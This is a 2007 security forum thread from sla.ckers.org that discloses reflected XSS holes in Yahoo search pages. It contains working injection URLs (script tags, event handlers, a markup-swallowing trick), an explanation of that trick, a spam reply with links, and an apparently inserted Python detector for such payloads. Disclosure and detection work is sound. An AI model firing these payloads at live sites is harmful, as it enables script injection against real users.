Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
How do you yahoo?
Posted by: tx
Date: July 18, 2007 07:24PM

I'm hoping with javascript turned off. >;)

so, lack of router had me out of the loop for a while, but I return with a hat trick:

http://search.personals.yahoo.com/us/results/results?searchinternal=1&kws=0&pagenum=50&resulttype=1&searchview=1&searchsort=1&affsource=-xss&adid=&speed=2&advanced=&primary=&searchname=&modified=&bes=&keywords=%22%3E%3Cscript%3Ealert%28%27Lookin%5C%27%20fer%20love%5Cnin%20all%20the%20wrong%20places...%27%29%3B%3C/script%3E%5D%5D%21%3E%3C%21%5B%20&searchsource=3
javascript only executes if the user has already made a successful search (like this: http://search.personals.yahoo.com/us/results/results?resulttype=1&searchmode=1&searchsource=1&searchview=1&advanced=1&r_gender=2&r_gender_pref=1&r_min_age=20&r_max_age=40&r_has_photo=2&r_radius=80&r_loc_ver=2&r_education=999&r_body_type_w=0&r_ethnicity_w=0&&r_city=Hollywood&r_country=United%20State&r_latitude=341066&r_loc_ver=2&r_locid=24023342&r_longitude=-1182877&r_state=California&r_state_code=CA&r_zip=90078&). The 'keywords' variable seems to be used to refine a search, so some search results have to be there in the first place.


http://search.messages.yahoo.com/search?.mbintl=finance'onmouseover='alert(String.fromCharCode(88,83,83));'&q=stock&type=5h4fOyrVWscxUKTv.S3gUptyDexcF5k_N1aqaIA_os5zQmPn7n.OWvTit56AVIY8&action=Search&srch=1&v=Z2OkLT3VWsch65KZBXoCmNuHCfLlsu_jszH6iaEhtmQNMXxRv796x7MpVtKePA--&b=1&within=subject&within=msgtext&showthread=tm&sentiment=0&thisuser=&postedon=pd&sMonth=7&sDay=18&sYear=2007&eMonth=7&eDay=18&eYear=2007 <-- the onmouseover event fires from the Next link (and arrow) at the bottom of the page

http://travel.yahoo.com/trip-search-country-'%22%3E%3Cimg%20src=tx%20onerror=alert('xss')%3E%5D!%3E%3C!%5B

-tx @ lowtech-labs.org



Edited 1 time(s). Last edit at 07/18/2007 07:29PM by tx.

Re: How do you yahoo?
Posted by: John
Date: July 18, 2007 07:50PM

This topic had me going O_O from the beginning, but lol, nice find.

That is quite a sexy POC you have there.

One question. How come when I remove ]!><![ I get the alert multiple times, but when I leave it I get it once?



Edited 2 time(s). Last edit at 07/18/2007 07:52PM by John.

Re: How do you yahoo?
Posted by: tx
Date: July 18, 2007 08:06PM

All characters within <![ and ]!> will be ignored by the parser, and instead are interpreted as character data ( CDATA ) in xml http://en.wikipedia.org/wiki/CDATA . Afaik a CDATA block should be opened with <![CDATA[ and closed with ]]>, but for these purposes (to hide a bunch of markup from the parser) it works effectively.

-tx @ lowtech-labs.org

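As an added example (not code from this thread, from tx, or from Yahoo), here is a small Python checker that URL-decodes the path and query values of a request and flags the payload shapes seen in this thread: a quote closing the current context followed by a tag, an inline event handler, a script tag, and the `]]!><![` / `]!><![` swallow marker tx explains above. The indicator patterns and the short benign URL are my own construction; the three other URLs are the ones posted in the thread.

```python
import re
from urllib.parse import urlsplit, unquote

# Indicator patterns modelled on the payload shapes posted in this thread: a
# quote that closes the current attribute or text context followed by a new tag,
# an inline event handler, a script tag, and the "]]!><![" / "]!><![" marker
# that makes the parser swallow whatever markup follows the injection point.
INDICATORS = {
    "script_tag": re.compile(r"<\s*script\b", re.I),
    "tag_after_quote": re.compile(r"""["']\s*>\s*<\s*[a-z]""", re.I),
    "event_handler": re.compile(r"\bon[a-z]+\s*=", re.I),
    "cdata_swallow": re.compile(r"\]{1,2}!>\s*<!\["),
}

def decode_fully(text, max_rounds=3):
    """Percent-decode until the value stops changing (defeats double encoding)."""
    for _ in range(max_rounds):
        decoded = unquote(text)  # '+' is left as-is; only %XX escapes are decoded
        if decoded == text:
            break
        text = decoded
    return text

def scan_url(url):
    """Return sorted (location, indicator) pairs found in one request URL."""
    # Inspect the path as well as every query value: the thread shows injection
    # through query parameters (keywords, .mbintl) and through a path segment.
    parts = urlsplit(url)
    fields = [("path", decode_fully(parts.path))]
    for pair in filter(None, parts.query.split("&")):  # skip empty "&&" pairs
        name, _, value = pair.partition("=")
        fields.append((name, decode_fully(value)))
    findings = set()
    for location, text in fields:
        for label, pattern in INDICATORS.items():
            if pattern.search(text):
                findings.add((location, label))
    return sorted(findings)

# The three request URLs as posted in the thread, plus one constructed benign
# search (not from the thread) for comparison.
PERSONALS = "http://search.personals.yahoo.com/us/results/results?searchinternal=1&kws=0&pagenum=50&resulttype=1&searchview=1&searchsort=1&affsource=-xss&adid=&speed=2&advanced=&primary=&searchname=&modified=&bes=&keywords=%22%3E%3Cscript%3Ealert%28%27Lookin%5C%27%20fer%20love%5Cnin%20all%20the%20wrong%20places...%27%29%3B%3C/script%3E%5D%5D%21%3E%3C%21%5B%20&searchsource=3"
MESSAGES = "http://search.messages.yahoo.com/search?.mbintl=finance'onmouseover='alert(String.fromCharCode(88,83,83));'&q=stock&type=5h4fOyrVWscxUKTv.S3gUptyDexcF5k_N1aqaIA_os5zQmPn7n.OWvTit56AVIY8&action=Search&srch=1&v=Z2OkLT3VWsch65KZBXoCmNuHCfLlsu_jszH6iaEhtmQNMXxRv796x7MpVtKePA--&b=1&within=subject&within=msgtext&showthread=tm&sentiment=0&thisuser=&postedon=pd&sMonth=7&sDay=18&sYear=2007&eMonth=7&eDay=18&eYear=2007"
TRAVEL = "http://travel.yahoo.com/trip-search-country-'%22%3E%3Cimg%20src=tx%20onerror=alert('xss')%3E%5D!%3E%3C!%5B"
BENIGN = "http://search.personals.yahoo.com/us/results/results?keywords=Hollywood&searchsource=3"

if __name__ == "__main__":
    for url in (PERSONALS, MESSAGES, TRAVEL, BENIGN):
        print(urlsplit(url).netloc, scan_url(url))
```

Run over web server access logs, a non-empty result from `scan_url` is a cheap first-pass signal for reflected-XSS probing against the parameters named in this thread.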
Re: How do you yahoo?
Posted by: testi32
Date: July 23, 2007 05:21AM

Yahoo for me is the worst one: http://www.testi32.com/di/queen/index.php
Take a closer look at Yahoo! Mail. Get these great features: Powerful protection against spam and viruses, 1GB of email storage, PhotoMail, message size up as the said : http://www.testi32.com/di/joe-jackson/index.php letras for cazoni italene

minoi 0 : http://www.testi32.com/di/donna-summer/index.php
donna - http://www.testi32.com/di/dru-hill/index.php

Re: How do you yahoo?
Posted by: tx
Date: July 23, 2007 12:04PM

yes, I also hate how yahoo indexes songs by Queen and Joe Jackson. wtf? spammer...

-tx @ lowtech-labs.org

Re: How do you yahoo?
Posted by: tx
Date: July 25, 2007 11:39PM

FIXED: search.personals.yahoo.com & travel.yahoo.com (why were you allowing < and > in the title anyway?)

no love for search.messages.yahoo.com though, Yahoo?

-tx @ lowtech-labs.org
